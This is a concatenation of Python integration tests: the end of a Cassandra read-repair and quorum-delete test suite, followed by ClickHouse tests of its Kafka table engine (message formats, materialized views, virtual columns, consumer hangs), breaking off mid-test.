cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
# insert 2 columns in one row
insert_columns(self, session, 0, 2)
# Delete the row while first node is dead
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
query = SimpleStatement('DELETE FROM cf WHERE key=\'k0\'', consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.start()
# Query first column
session = self.patient_cql_connection(node1, 'ks')
assert_none(session, "SELECT c, v FROM cf WHERE key=\'k0\' LIMIT 1", cl=ConsistencyLevel.QUORUM)
@ported_to_in_jvm('4.0')
def test_short_read_quorum_delete(self):
"""
@jira_ticket CASSANDRA-8933
"""
cluster = self.cluster
# Consider however 3 nodes A, B, C (RF=3), and following sequence of operations (all done at QUORUM):
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v)) WITH read_repair_chance = 0.0")
else:
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v))")
# we write 1 and 2 in a partition: all nodes get it.
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 1)", consistency_level=ConsistencyLevel.ALL))
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 2)", consistency_level=ConsistencyLevel.ALL))
# we delete 1: only A and C get it.
node2.flush()
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 1", consistency_level=ConsistencyLevel.QUORUM))
node2.start()
# we delete 2: only B and C get it.
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 2", consistency_level=ConsistencyLevel.QUORUM))
node1.start()
session = self.patient_cql_connection(node1, 'ks')
# we read the first row in the partition (so with a LIMIT 1) and A and B answer first.
node3.flush()
node3.stop(wait_other_notice=True)
assert_none(session, "SELECT * FROM t WHERE id = 0 LIMIT 1", cl=ConsistencyLevel.QUORUM)
@ported_to_in_jvm('4.0')
def test_readrepair(self):
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
if cluster.version() < '4.0':
create_c1c2_table(self, session, read_repair=1.0)
else:
create_c1c2_table(self, session)
node2.stop(wait_other_notice=True)
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)
node2.start(wait_for_binary_proto=True)
# query everything to cause RR
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.QUORUM)
node1.stop(wait_other_notice=True)
# Check node2 for all the keys that should have been repaired
session = self.patient_cql_connection(node2, keyspace='ks')
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.ONE)
def test_quorum_available_during_failure(self):
cl = ConsistencyLevel.QUORUM
rf = 3
logger.debug("Creating a ring")
cluster = self.cluster
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
logger.debug("Set to talk to node 2")
session = self.patient_cql_connection(node2)
create_ks(session, 'ks', rf)
create_c1c2_table(self, session)
logger.debug("Generating some data")
insert_c1c2(session, n=100, consistency=cl)
logger.debug("Taking down node1")
node1.stop(wait_other_notice=True)
logger.debug("Reading back data.")
for n in range(100):
query_c1c2(session, n, cl)
def stop_node(self, node_number):
to_stop = self.cluster.nodes["node%d" % node_number]
to_stop.flush()
to_stop.stop(wait_other_notice=True)
def delete(self, stopped_node_number, key, column):
next_node = self.cluster.nodes["node%d" % (((stopped_node_number + 1) % 3) + 1)]
session = self.patient_cql_connection(next_node, 'ks')
# delete data for normal key
query = 'BEGIN BATCH '
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c%06d\'; ' % (key, column)
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c2\'; ' % (key,)
query = query + 'APPLY BATCH;'
simple_query = SimpleStatement(query, consistency_level=ConsistencyLevel.QUORUM)
session.execute(simple_query)
def restart_node(self, node_number):
stopped_node = self.cluster.nodes["node%d" % node_number]
stopped_node.start(wait_for_binary_proto=True)
|
test.py | import os.path as p
import random
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsResponse_v1, DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
import socket
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
config_dir='configs',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml' ],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
# print ("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in consumer.poll(5000).items():
if toppar.topic == topic:
for message in messages:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = ''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic=topic, value=data)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic':topic, 'partitions':partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP TABLE IF EXISTS test.kafka')
wait_kafka_is_available()
print("kafka is available - running test")
yield # run test
instance.query('DROP TABLE IF EXISTS test.kafka')
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('kafka1:19092', 'old', 'old', 'JSONEachRow', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == u'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'new',
kafka_group_name = 'new',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_client_id = '{instance} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == u'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }', '{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
time.sleep(9)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer','100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
#kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
#echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in offsets.items():
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages*batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query('SELECT _key, key, _topic, value, _offset, _partition, _timestamp FROM test.kafka', ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001, headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002, headers=[('empty_value', ''),('', 'empty name'), ('',''), ('repetition', '1'), ('repetition', '2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003, headers=[('b', 'b'),('a', 'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004, headers=[('a', 'a'),('b', 'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
